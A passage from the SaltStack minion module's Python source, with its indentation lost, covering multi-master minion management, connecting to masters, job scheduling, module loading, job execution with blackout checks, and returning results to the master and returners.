ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue or []
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warn("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if multifunc_ordered:
ret['return'][ind] = func(*args, **kwargs)
ret['retcode'][ind] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][ind] = True
else:
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['retcode'][data['fun'][ind]] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
